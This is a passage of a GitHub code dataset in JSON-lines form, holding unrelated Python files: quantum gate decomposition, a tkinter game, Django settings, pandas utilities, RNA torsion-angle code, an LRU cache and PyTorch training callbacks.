bsm.xx[idx_r,idx_r]==1:\n            gateseq_8910.append((\"R_pi4\", idx_r))\n            bsm.right_R_pi4(idx_r)\n            Hs_on.add(idx_r)\n        for idx_c in range(idx_r):\n            if bsm.xx[idx_r,idx_c]==1:\n                gateseq_8910.append((\"CZ\", idx_c, idx_r))\n                bsm.right_CZ(idx_c,idx_r)\n                Hs_on.update(set([idx_c,idx_r]))\n\n    # STEP 10.\n    bsm.right_H_all()\n\n    appropriate_Hs=[(\"H\",idx) for idx in list(Hs_on)]\n\n    gateseq_8910=appropriate_Hs + gateseq_8910 + appropriate_Hs\n\n    right_gateseq += gateseq_8910\n\n    # Do a final check that the identity matrix is obtained. This should always\n    # be the case, and if it is not, that indicates a pretty serious bug.\n    # Note that this check is pretty quick compared to the above procedure, so\n    # we are not too worried about the slowdown.\n    # Moreover, this check doesn't occur in any inner loops, hopefully.\n    if not np.all(bsm._arr == np.eye(2 * bsm.nq)):\n        print(bsm._arr)\n        raise RuntimeError(\"Internal error in bsf_decomp.py; decomposition did not produce identity.\")\n\n    return left_gateseq, right_gateseq\n","repo_name":"cgranade/python-quaec","sub_path":"src/qecc/bsf_decomp.py","file_name":"bsf_decomp.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"18"}
+{"seq_id":"24197265886","text":"import pickle\nfrom typing import Union\nimport tkinter as tk\n\n\nclass Ball:\n    def __init__(self, canvas: tk.Canvas):\n        self.canvas = canvas\n        self.canvas_width = self.canvas.winfo_reqwidth()\n        self.canvas_height = self.canvas.winfo_reqheight()\n        self.radius = 20\n        self.x, self.y = 0, 0\n        self.vx, self.vy = 0, 0\n        self.speed = 0\n        self.timer = 0\n        self.step = 0.1\n        self.id = self.canvas.create_oval(0, 0, 0, 0, fill=None, width=0)\n        self.move_history = []\n\n    def check_border_collision(self) -> None:\n        # top border collision\n        if self.y <= self.radius:\n            self.vy = abs(self.vy)  # set positive speed\n\n        # bottom border collision\n        elif self.y >= (self.canvas_height - self.radius):\n            self.vy = -abs(self.vy)  # set negative speed\n\n    def move(self, acc: int, step: Union[float, int]) -> None:\n        self.check_border_collision()\n\n        self.vy += acc * step  # increase the speed by the amount of acceleration\n\n        x = self.x + self.vx * step  # change x coord\n        y = self.y + self.vy * step  # change y coord\n\n        self.canvas.move(self.id, x - self.x, y - self.y)  # move ball on delta\n        self.x, self.y = x, y  # reset self coordinates\n        self.move_history.append([self.x, self.y])  # store coordinates into list\n\n    def game_over(self) -> bool:\n        if self.x >= self.canvas_width + self.radius / 2:  # ball crossed the right border\n            self.save_history()\n            return True\n        return False\n\n    def save_history(self) -> None:\n        with open('logs/move_history.pkl', 'wb') as f:\n            pickle.dump(self.move_history, f)\n\n    # delete 
and redraw element\n    def draw(self) -> int:\n        self.canvas.delete(self.id)\n        _id = self.canvas.create_oval(self.x - self.radius / 2,\n                                      self.y - self.radius / 2,\n                                      self.x + self.radius / 2,\n                                      self.y + self.radius / 2, fill=\"white\")\n        return _id\n\n\n\n\n\n","repo_name":"yavorich/CatchTheBall","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72907940199","text":"import os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nSECRET_KEY = '@w_4al_o=x@va()uk7+^_3-&v9*h$l$-y2@2=3udo&u&e=u8yf'\n\nDEBUG = True\n\nALLOWED_HOSTS = []\n\nINSTALLED_APPS = [\n    'jet.dashboard',\n    'jet',\n    'django.contrib.admin',\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.messages',\n    'django.contrib.staticfiles',\n    'authentication',\n    'visage',\n]\n\nMIDDLEWARE = [\n    'django.middleware.security.SecurityMiddleware',\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.middleware.locale.LocaleMiddleware',\n    'django.middleware.common.CommonMiddleware',\n    'django.middleware.csrf.CsrfViewMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n    'django.contrib.messages.middleware.MessageMiddleware',\n    'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'icms.urls'\n\nTEMPLATES = [\n    {\n        'BACKEND': 'django.template.backends.django.DjangoTemplates',\n        'DIRS': [os.path.join(BASE_DIR, 'templates')],\n        'APP_DIRS': True,\n        'OPTIONS': {\n            'context_processors': [\n                'django.template.context_processors.debug',\n                'django.template.context_processors.request',\n                'django.contrib.auth.context_processors.auth',\n                'django.contrib.messages.context_processors.messages',\n            ],\n        },\n    },\n]\n\nWSGI_APPLICATION = 'icms.wsgi.application'\n\nCACHES = {\n    'default': {\n        'BACKEND': 'django.core.cache.backends.memcached.PyLibMCCache',\n        'LOCATION': 'localhost:11211',\n    },\n}\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.postgresql',\n        'NAME': 'icms',\n        'USER': 'icms',\n        'PASSWORD': 'icms',\n        'HOST': 'localhost',\n        'PORT': '5432',\n    },\n}\n\nAUTH_PASSWORD_VALIDATORS = [\n    {\n        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n    },\n    {\n        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n    },\n    {\n        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n    },\n    {\n        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n    },\n]\n\nLANGUAGES = [\n    ('en', 'English'),\n    ('fa', 'Farsi'),\n]\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nLOCALE_PATHS = [\n    os.path.join(BASE_DIR, 'locale'),\n]\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\nEMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'\n\nJET_THEMES = [\n    {\n        'theme': 'default',\n        'color': '#47bac1',\n        'title': 'Default'\n    },\n    {\n        'theme': 'green',\n        'color': '#44b78b',\n        'title': 'Green'\n    },\n    {\n        'theme': 'light-green',\n        'color': '#2faa60',\n        'title': 'Light Green'\n    },\n    {\n        'theme': 'light-violet',\n        'color': '#a464c4',\n        'title': 'Light Violet'\n    },\n    {\n        'theme': 'light-blue',\n        'color': '#5EADDE',\n        'title': 'Light Blue'\n    },\n    {\n        'theme': 'light-gray',\n        'color': '#222',\n        'title': 'Light Gray'\n    
}\n]\n","repo_name":"kahrabian/icms","sub_path":"icms/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71909018600","text":"from django.shortcuts import render\n\n\ndef main_view(request):\n context = {\"russian_text\": 'Здравствуйте, мои дорогие любители английского языка! '\n 'Я рада приветствовать вас на этом сайте. '\n 'Здесь вы можете найти много полезной информации, '\n 'касающейся изучения английского языка и методики его преподавания. '\n 'Есть много бесплатных материалов и тех, которые вы можете купить. '\n 'Я буду счастлива помочь вам улучшить ваши навыки и расширить знания английского языка, '\n 'разнообразить ваши уроки, если вы учитель. '\n 'Оставайтесь на связи и помните – совершенству нет предела!',\n \"english_text\": 'Hello, my dear English lovers! '\n 'I’m glad to welcome you at this site. '\n 'Here you can find much useful information concerning to '\n 'English studying and teaching methodic. '\n 'There are many free materials and those ones you can buy. '\n 'I’ll be happy to help you to improve your skills and widen your knowledge of English, '\n 'to vary your lessons if you’re a teacher. '\n 'Stay tune and remember – the sky is the limit!'\n }\n return render(request, 'main_app/main.html', context)\n","repo_name":"Pol888/my_diploma_web_project","sub_path":"my_diploma_web_project/main_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30758240372","text":"#song_result_interface.py\n#Authors: Nick Stapleton\n\n# results = CSVInterface.getSong(title='Song Title From Front End')\n\n# 0 <= len(results) \n\n# ANN_result.py\nresult = {\n # data team\n\t'song_id' : int(),\n\t'title': 'Song Title From Front End',\n\n\t## add more info like year or record label\n\t'metadata': { # for front end team\n\t\t'artist': 'placeholder'\n\t},\n\n\t## get data for ml prediction\n\t'subset': str(), # small, medium, full...\n\t'X': [[]], # the features for the song with matching title, use pd.DataFrame.values\n\t'genre_top': str(), # from tracks.csv\n\n\t# the result of the ml team's prediction\n\t# ml team interface\n\t'prediction': {\n\t\t'result': str(), # the top item of genres\n\t\t'genres': { # list of 16 of genre probabilities sorted by most likely to least likely\n\t\t'threshold': int(), # build a list of threshold length to guarantee it will contain the answer\n\t\t},\n\t\t'score': int() # position the actual genre_top is in the list of prediction.genres\n\t},\n\n\t# back end team\n\t'error': '' # init to empty string. 
front end team will have to handle: error, 1 result, more than 1 results.\n}\n","repo_name":"nhstaple/ecs-171-music-genre-classifier","sub_path":"Back_End/song_result_interface.py","file_name":"song_result_interface.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"23366220068","text":"import pandas as pd\nimport builtins\nfrom typing import Union, List, Dict\n\n\ndef replace_bad_vals(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Replace newline characters in dataframe\n\n Parameters\n ----------\n df : pd.DataFrame\n\n Returns\n -------\n pd.DataFrame\n \"\"\"\n for col in [x for x in df.columns.values if df[x].dtype == \"object\"]:\n rowct = len(\n df[\n (df[col].str.contains(r\"\\n\") == True)\n | (df[col].str.contains(r\"\\r\") == True)\n ]\n )\n if rowct > 0:\n print(f\"Bad values found in {col} -- {rowct}\")\n df[col] = df[col].str.replace(r\"\\r\", \"\", regex=True)\n df[col] = df[col].str.replace(r\"\\n\", \"\", regex=True)\n\n return df\n\n\ndef col_to_datetime(df: pd.DataFrame, col: Union[str, list]) -> pd.DataFrame:\n \"\"\"Format pandas column(s) as datetime\n\n Parameters\n ----------\n df : pd.DataFrame\n col : Union[str, list]\n str or list of str (column names)\n\n Returns\n -------\n pd.DataFrame\n \"\"\"\n if isinstance(col, str):\n col = [col]\n\n for c in col:\n df[c] = pd.to_datetime(df[c])\n\n return df\n\n\ndef limit_df_fields(\n df: pd.DataFrame, fields: list, default_cols: dict = None\n) -> pd.DataFrame:\n \"\"\"Standardize fields in dataframe\n\n Parameters\n ----------\n df : pd.DataFrame\n fields : list\n list of fields to keep\n default_cols (dict, optional): dict, default None\n dictionary of columns & default values to add if missing\n ex. `{col:default_val}`\n\n Returns\n -------\n pd.DataFrame\n \"\"\"\n cols_to_drop = [col for col in df.columns.values if col not in fields]\n df.drop(columns=cols_to_drop, inplace=True)\n if default_cols:\n for field in [\n (k, v) for k, v in default_cols.items() if k not in df.columns.values\n ]:\n df[field[0]] = field[1]\n print(f\"Added field {field[0]} with default val {field[1]}\")\n df = df[[f for f in fields]]\n return df\n\n\ndef nested_dict_to_df(\n raw_data: Union[List, Dict],\n remove_value_types: list = None,\n df_params: dict = None,\n rename_cols: dict = None,\n delete_fields: list = None,\n index_cols: dict = None,\n rename_patterns: dict = None,\n add_fields: dict = None,\n) -> pd.DataFrame:\n \"\"\"Parses a nested array of dict to a pandas dataframe\n\n Parameters\n ----------\n raw_data : Union[List, Dict]\n remove_value_types (list, optional): list, default None\n types to remove from nested dictionaries ex. `list`\n df_params (dict, optional): dict, default None\n parameters to pass to pd.json_normalize\n https://pandas.pydata.org/docs/reference/api/pandas.json_normalize.html\n rename_cols (dict, optional): dict, default None\n dict of column renames\n ex. `{oldname:newname}`\n delete_fields (list, optional): list, default None\n fields to drop from the df entirely\n index_cols (dict, optional): dict, default None\n list of cols to be considered 'index' -- move to front of order\n rename_patterns (dict, optional): dict, default None\n dictionary of rename_patterns to apply to column names\n ex. `{'dict.col':'col'} would rename dict.col.name to col.name`\n add_fields (dict, optional): dict, default None\n dictionary of columns & default values to add if missing\n ex. 
`{col:default_val}`\n\n    Returns\n    -------\n    pd.DataFrame\n    \"\"\"\n    if type(df_params) == list:\n        df = raw_data.copy()\n        for df_param in df_params:\n            if type(df) == pd.DataFrame:\n                df = df.to_dict(orient=\"records\")\n            df = pd.json_normalize(df, **df_param)\n\n    elif remove_value_types:\n        remove_value_types = [getattr(builtins, x) for x in remove_value_types]\n        df = pd.json_normalize(\n            [\n                {k: v for k, v in d.items() if type(v) not in remove_value_types}\n                for d in raw_data\n            ],\n            **(df_params or {}),\n        )\n    else:\n        df = pd.json_normalize(raw_data, **(df_params or {}))\n\n    if rename_cols:\n        df = df.rename(columns=rename_cols)\n\n    if add_fields:\n        for k, v in add_fields.items():\n            df[k] = v\n\n    if delete_fields:\n        df = df.drop(columns=delete_fields)\n\n    if index_cols:\n        df = df[\n            index_cols + [col for col in df.columns.values if col not in index_cols]\n        ]\n    if rename_patterns:\n        for k, v in rename_patterns.items():\n            df = df.rename(columns={k: v})\n\n    return df\n","repo_name":"coperyan/python-modules","sub_path":"modules/pandas/df.py","file_name":"df.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"3259045565","text":" # -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 18 16:52:10 2019\n\n@author: jacqu\n\nComputing angles for backbone and base, for 1 nt \n\nNew version : all angles + proper computation \n\"\"\"\n\nimport numpy as np\nimport itertools\nimport pickle \nimport os \nimport networkx as nx\nfrom rna_classes import *\n\nimport sys\nif __name__ == \"__main__\":\n    script_dir = os.path.dirname(os.path.realpath(__file__))\n    sys.path.append(os.path.join(script_dir, '..'))\n\n    from utils import *\n    \ndef norm(vec):\n    # Normalizes a vector; accepts tuples or lists and returns a unit numpy array\n    vec = np.asarray(vec, dtype=float)\n    return vec / np.linalg.norm(vec)\n\ndef ortho(vec,ref):\n    # Returns orthogonal component of vec to ref \n    # ! Ref should already be a normed vector\n    \"\"\"\n    if(np.abs(np.linalg.norm(ref)-1)>0.001): # Ref is not a normed vector : norm it \n        ref = norm(ref)\n    \"\"\"\n    vprime = vec - ref * np.dot(vec,ref)\n    return vprime/np.linalg.norm(vprime)\n    \ndef angle(ba,bc):\n    \"\"\" radians angle between two unnormed vectors (numpy array, shape (3,))\"\"\"\n    cosine_angle = np.dot(ba, bc) / (np.linalg.norm(ba) * np.linalg.norm(bc))\n    angle = np.arccos(cosine_angle)\n\n    return angle\n\ndef torsion(a,b,c,d, unit = 'rad'):\n    # Torsion angle between bonds ab and cd , around axis bc. \n    # Input are atoms from rna classes format (a.x, a.y, a.z coordinates)\n    \n    # norm bc : \n    bc = float(c.x)-float(b.x), float(c.y)-float(b.y), float(c.z)-float(b.z)\n    bc = norm(bc)\n    \n    # vectors ba and cd : \n    ba = float(a.x)-float(b.x), float(a.y)-float(b.y), float(a.z)-float(b.z)\n    cd = float(d.x)-float(c.x), float(d.y)-float(c.y), float(d.z)-float(c.z)\n    \n    # Orthogonal components of ba and cd wrt. 
axis bc : \n ba_O = ortho(ba, bc)\n cd_O = ortho(cd, bc)\n \n # Compute angle and sign\n angle_rad = np.arccos(np.dot(ba_O, cd_O)) \n sign = np.dot(np.cross(ba_O, cd_O), bc) \n if (sign < 0):\n angle_rad = -angle_rad\n \n # Output in desired unit \n if(unit=='deg'):\n return angle_rad *180 /np.pi\n else:\n return angle_rad\n\ndef center(atoms):\n \"\"\" Computes center of mass given atoms of a base and returns coordinates as tuple (x,y,z)\"\"\"\n base_atoms = {'N1', 'C2', 'N3', 'C4', 'C5','C6','O2', 'O4', 'N4'} # pyrimidine atoms \n base_atoms.update({'N2', 'O6', 'N6', 'N7','C8', 'N9'}) # purine specific ones \n cx,cy,cz = 0,0,0\n cpt =0\n for a in atoms : \n if(a.atom_label in base_atoms):\n cx += float(a.x)\n cy += float(a.y)\n cz += float(a.z)\n cpt+=1\n if(cpt >0):\n return (cx/cpt, cy/cpt, cz/cpt)\n else:\n return (0,0,0)\n\ndef base_angles(nucleotide, nt_prev=None, nt_next=None):\n \"\"\"\n Takes a nucleotide object and returns defined angles values. unit = 'rad' or 'deg'.\n Out type : tuple \n \n TODO:\n alpha: O3'(i-1)-P-O5'-C5'\n beta: P-O5'-C5'-C4'\n gamma: O5'-C5'-C4'-C3'\n delta: C5'-C4'-C3'-O3'\n epsilon: C4'-C3'-O3'-P(i+1)\n zeta: C3'-O3'-P(i+1)-O5'(i+1)\n chi : glyc bond torsion\n base_gly : angle btw gly bond and base vector (NG, G is base geom center)\n \n \"\"\"\n \n # Set all angles to zero by default (will be used as error marker)\n alpha, beta, gamma, delta, epsilon, zeta, chi, base_gly = [0.0 for i in range(8)]\n \n # 1/ Angles with only current nucleotide \n atoms=nucleotide.atoms\n for a in atoms : \n if a.atom_label ==\"C1'\":\n c1p = a \n elif a.atom_label ==\"C3'\":\n c3p = a \n elif a.atom_label ==\"O3'\":\n o3p = a \n elif a.atom_label == \"O4'\":\n o4p=a\n elif a.atom_label ==\"C4'\":\n c4p = a \n elif a.atom_label ==\"C5'\":\n c5p = a\n elif a.atom_label ==\"O5'\":\n o5p = a \n elif a.atom_label ==\"P\":\n P = a\n \n if (nucleotide.nt in ('G','A')): # Purine, chi = O4'-C1' // N9-C4\n \n n_base = [a for a in atoms if a.atom_label ==\"N9\"]\n c_base = [a for a in atoms if a.atom_label=='C4']\n \n if len(n_base)==1:\n n_base = n_base[0]\n if len(c_base)==1:\n c_base = c_base[0]\n \n elif (nucleotide.nt in ('U','C')): #Pyrimidine , chi = O4'-C1' // N1-C2\n \n n_base = [a for a in atoms if a.atom_label ==\"N1\"]\n c_base = [a for a in atoms if a.atom_label=='C2']\n \n if len(n_base)==1:\n n_base = n_base[0]\n if len(c_base)==1:\n c_base = c_base[0]\n \n #beta: P-O5'-C5'-C4'\n try:\n beta = torsion (P, o5p, c5p, c4p)\n except:\n pass\n \n #gamma: O5'-C5'-C4'-C3'\n try:\n gamma = torsion(o5p, c5p, c4p, c3p)\n except:\n pass\n \n # Delta : C5'-C4'-C3'-O3'\n try:\n delta = torsion(c5p, c4p, c3p, o3p)\n except:\n pass\n \n # Chi torsion angle : O4p C1p Nbase Cbase\n try:\n chi = torsion(o4p, c1p, n_base, c_base)\n except:\n pass\n \n # Angle btw glycosidic bond (NC1') and base (NG, G center of base)\n try:\n #vector NC1'\n u = [float(c1p.x)-float(n_base.x), float(c1p.y)-float(n_base.y), float(c1p.z)-float(n_base.z) ]\n #vector NG\n gx, gy, gz = center(atoms)\n v=[float(gx)-float(n_base.x), float(gy)-float(n_base.y), float(gz)-float(n_base.z)]\n base_gly = angle(u, v)\n except:\n pass\n \n # 2/ Prev nucleotide\n alpha = 0 # error (default)\n if(nt_prev !=None):\n atoms = nt_prev.atoms\n o3p_prev = [a for a in atoms if a.atom_label ==\"O3'\"]\n \n if(len(o3p_prev)==1):\n o3p_prev=o3p_prev[0]\n # alpha: O3'(i-1)-P-O5'-C5'\n try:\n alpha = torsion(o3p_prev, P, o5p, c5p)\n except:\n pass\n \n #3 / next nucleotide \n epsilon, zeta = 0,0\n if(nt_next !=None):\n atoms = 
nt_next.atoms\n o5p_next = [a for a in atoms if a.atom_label ==\"O5'\"]\n P_next = [a for a in atoms if a.atom_label ==\"P\"]\n \n if len(P_next)==1:\n P_next = P_next[0]\n #epsilon: C4'-C3'-O3'-P(i+1)\n try:\n epsilon = torsion(c4p, c3p, o3p, P_next)\n except:\n pass\n \n if len(o5p_next)==1:\n o5p_next = o5p_next[0]\n #zeta: C3'-O3'-P(i+1)-O5'(i+1)\n try:\n zeta = torsion(c3p, o3p, P_next, o5p_next)\n except:\n pass\n \n return [alpha, beta, gamma, delta, epsilon, zeta, chi, base_gly] # 8 angles output \n\ndef norm_base_angles(nucleotide):\n # Computes angles phi, psi of the normal vector to the base plane \n atoms = nucleotide.atoms\n # center G \n gx, gy, gz = center(atoms)\n if((gx,gy,gz)==(0,0,0)):\n return 0,0\n \n if (nucleotide.nt in ('G','A')): # Purine, chi = O4'-C1' // N9-C4\n \n n_base = [a for a in atoms if a.atom_label ==\"N9\"]\n \n if len(n_base)==1:\n n_base = n_base[0]\n \n elif (nucleotide.nt in ('U','C')): #Pyrimidine , chi = O4'-C1' // N1-C2\n \n n_base = [a for a in atoms if a.atom_label ==\"N1\"]\n \n if len(n_base)==1:\n n_base = n_base[0]\n \n c5 = [a for a in atoms if a.atom_label ==\"C5\"]\n if(len(c5)>0):\n c5 = c5[0]\n \n try:\n # vector G-N\n u = -1*np.array([float(gx)-float(n_base.x), float(gy)-float(n_base.y), float(gz)-float(n_base.z) ])\n # vector G-C5 \n v = -1*np.array([float(c5.x)-float(n_base.x), float(c5.y)-float(n_base.y), float(c5.z)-float(n_base.z) ])\n \n # normal vec \n n = np.cross(u,v)\n n=norm(n)\n except:\n return 0,0\n \n r=np.sqrt(n[0]**2+n[1]**2+n[2]**2)\n # radial coordinates angles \n phi = np.arctan(n[1]/n[0])\n theta = np.arccos(n[2]/r)\n \n return theta, phi\n \n \nif __name__=='__main__':\n \n # Load a sample graph \n gr_dir = \"C:/Users/jacqu/Documents/MegaSync Downloads/RNA_graphs\"\n graphs = os.listdir(gr_dir)\n pid=graphs[0]\n g=pickle.load(open(os.path.join(gr_dir,pid), 'rb'))\n \n for node, data in g.nodes(data=True):\n \n nucleotide = data['nucleotide']\n print('node id ', node[1])\n print('pdb position : ', nucleotide.pdb_pos)\n \n print('nt angles: ')\n print(norm_base_angles(nucleotide))\n\n \n\n \n \n\n\n","repo_name":"jacquesboitreaud/rna_ne","sub_path":"data_processing/angles.py","file_name":"angles.py","file_ext":"py","file_size_in_byte":8392,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"14935146656","text":"#!/usr/bin/python3\n\nfrom fabric.api import local\nfrom datetime import datetime\n\n\ndef do_pack():\n \"\"\"This will create a package with web_static\"\"\"\n local(\"sudo mkdir -p versions\")\n date = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n compressed = (\"versions/web_static_{}.tgz\".format(date))\n local(\"sudo tar -cvzf {} web_static\".format(compressed))\n return compressed\n","repo_name":"fruizga/AirBnB_clone_v2","sub_path":"1-pack_web_static.py","file_name":"1-pack_web_static.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75060116519","text":"#This class implements a CPU cache as outlined in the project promt, includng a replacement policy of LRU (least recently used). \n\n\nimport collections\n\ncache_size = 16\n\nclass Cache:\n\n def __init__(self):\n self.cache = collections.OrderedDict()\n \n # By removing and reinserting the value to the cache, we keep track of how recently information has been used. 
\n    def search_cache(self, address):\n        if address in self.cache:\n            value = self.cache.pop(address)\n            self.cache[address] = value\n            return value\n        else:\n            return None    \n    \n    #Replacement policy- if the cache is full, we remove the least recently used item (LRU)\n    def write_cache(self, address, value):\n        if len(self.cache) >= cache_size:\n            self.cache.popitem(last=False)\n        self.cache[address] = value\n    ","repo_name":"phyxphysio/cpu_simulator","sub_path":"cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"14025410181","text":"class Solution:\n    def mostPopularCreator(self, creators: List[str], ids: List[str], views: List[int]) -> List[List[str]]:\n        return self.optimise(creators, ids, views)\n    \n    def optimise(self, creators, ids, views):\n        '''\n        Time Complexity: O(N)\n        Space Complexity: O(N)\n        '''\n        d = defaultdict(list)\n        ln = len(ids)\n        ret = []\n        \n        for i in range(ln):\n            d[creators[i]].append((ids[i], views[i]))\n        \n        maxi = {}\n        for k, v in d.items():\n            maxi[k] = sum([i[1] for i in v])\n        \n        max_views = max(maxi.values())\n        for k, v in maxi.items():\n            if v == max_views:\n                max_ = max([i[1] for i in d[k]])\n                min_ = min([i[0] for i in d[k] if i[1] == max_])\n                ret.append([k, min_])\n        \n        return ret\n    \n    def solve(self, creators, ids, views):\n        '''\n        Time Complexity: O(N)\n        Space Complexity: O(N)\n        '''\n        maxis = defaultdict(int)\n        cnt = defaultdict(int)\n        minis = {}\n        \n        ln = len(creators)\n        \n        for i in range(ln):\n            maxis[creators[i]] = max(maxis[creators[i]], views[i])\n            cnt[creators[i]] += views[i]\n\n        max_views = max(cnt.values())\n        for i in range(ln):\n            if cnt[creators[i]] == max_views and maxis[creators[i]] == views[i]:\n                if creators[i] in minis:\n                    minis[creators[i]] = min(minis[creators[i]], ids[i])\n                else:\n                    minis[creators[i]] = ids[i]\n        \n        ret = []\n        for k, v in cnt.items():\n            if v == max_views:\n                ret.append([k, minis[k]])\n        \n        return ret\n    ","repo_name":"prashanthr11/Leetcode_solutions","sub_path":"2456-most-popular-video-creator/2456-most-popular-video-creator.py","file_name":"2456-most-popular-video-creator.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"23148209020","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n# File: stats.py\n# Author: Tomás Vírseda\n# License: GPL v3\n# Description: Manage MiAZ stats\n\"\"\"\n\nfrom gettext import gettext as _\n\nfrom gi.repository import GObject\n\nfrom MiAZ.backend.env import ENV\nfrom MiAZ.backend.log import get_logger\nfrom MiAZ.backend.models import Group, Person, Country\nfrom MiAZ.backend.models import Purpose, Concept, SentBy\nfrom MiAZ.backend.models import SentTo, Date, Extension\n\nFields = {}\nFields[Date] = 0\nFields[Country] = 1\nFields[Group] = 2\nFields[SentBy] = 3\nFields[Purpose] = 4\nFields[Concept] = 5\nFields[SentTo] = 6\n\n\nclass MiAZStats(GObject.GObject):\n    __gtype_name__ = 'MiAZStats'\n    __gsignals__ = {\n        \"stats-updated\": (GObject.SignalFlags.RUN_LAST, None, ()),\n    }\n    stats = {}\n\n    def __init__(self, backend):\n        super(MiAZStats, self).__init__()\n        self.backend = backend\n        self.log = get_logger('MiAZStats')\n        self.util = self.backend.util\n\n    def _build(self, *args):\n        self.stats = {}\n        self.stats[_(Date.__title__)] = {}\n        self.stats[_(Date.__title__)][_('year')] = {}\n        self.stats[_(Date.__title__)][_('month')] = {}\n        self.stats[_(Date.__title__)][_('day')] = {}\n        
self.stats[_(Country.__title__)] = {}\n self.stats[_(Group.__title__)] = {}\n self.stats[_(SentBy.__title__)] = {}\n self.stats[_(Purpose.__title__)] = {}\n self.stats[_(SentTo.__title__)] = {}\n\n for document in self.util.get_files():\n fields = self.util.get_fields(document)\n\n # Date\n adate = self.util.string_to_datetime(fields[0])\n year = str(adate.year)\n month = '%s%02d' % (year, adate.month)\n day = '%s%02d' % (month, adate.day)\n\n try:\n self.stats[_(Date.__title__)][_('year')][year] += 1\n except KeyError:\n self.stats[_(Date.__title__)][_('year')][year] = 1\n\n try:\n self.stats[_(Date.__title__)][_('month')][month] += 1\n except KeyError:\n self.stats[_(Date.__title__)][_('month')][month] = 1\n\n try:\n self.stats[_(Date.__title__)][_('day')][day] += 1\n except KeyError:\n self.stats[_(Date.__title__)][_('day')][day] = 1\n\n # Rest of metadata\n for prop in [Country, Group, SentBy, Purpose, SentTo]:\n item = fields[Fields[prop]]\n try:\n self.stats[_(prop.__title__)][item] += 1\n except KeyError:\n self.stats[_(prop.__title__)][item] = 1\n\n self.log.debug(\"Stats updated\")\n self.emit('stats-updated')\n\n def get(self):\n self._build()\n return self.stats\n\n","repo_name":"t00m/MiAZ","sub_path":"MiAZ/backend/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74873854120","text":"from os.path import join, exists\nimport csv\n\nimport numpy as np\nimport torch\n\n\nclass Callback(object):\n\n def on_train_init(self, model, **kwargs):\n pass\n\n def on_train_fi(self, model, **kwargs):\n pass\n\n def on_epoch_init(self, model, epoch, **kwargs):\n pass\n\n def on_epoch_fi(self, logs_dict, model, epoch, **kwargs):\n pass\n\n def on_step_init(self, logs_dict, model, epoch, **kwargs):\n pass\n\n def on_step_fi(self, logs_dict, model, epoch,**kwargs):\n pass\n\n\nclass History(Callback):\n\n def __init__(self, keys=None):\n self.logs = {}\n\n if keys is None:\n self.keys = []\n else:\n self.keys = keys\n\n def on_train_init(self, model, **kwargs):\n self.logs['Train'] = {}\n self.logs['Validation'] = {}\n\n\n def on_epoch_init(self, model, epoch, **kwargs):\n self.logs['Train'][epoch] = {}\n self.logs['Validation'][epoch] = {}\n\n\n for k in self.keys:\n self.logs['Train'][epoch][k] = []\n\n\n def on_step_fi(self, logs_dict, model, epoch, **kwargs):\n for k,v in logs_dict.items():\n self.logs['Train'][epoch][k].append(v)\n\n\n def on_epoch_fi(self, logs_dict, model, epoch, **kwargs):\n for k,v in logs_dict.items():\n self.logs['Validation'][epoch][k]=v\n\n\nclass ModelCheckpoint(Callback):\n\n def __init__(self, dirpath, save_model_frequency):\n\n self.dirpath = dirpath\n self.save_model_frequency = save_model_frequency\n\n def on_epoch_fi(self, logs_dict, model, epoch, **kwargs):\n\n optimizer = kwargs['optimizer']\n checkpoint = {\n 'epoch': epoch + 1,\n }\n if isinstance(model, dict):\n for model_name, model_instance in model.items():\n checkpoint['state_dict_' + model_name] = model_instance.state_dict()\n else:\n checkpoint['state_dict'] = model.state_dict()\n\n if isinstance(optimizer, dict):\n for optimizer_name, optimizer_instance in optimizer.items():\n checkpoint['optimizer_' + 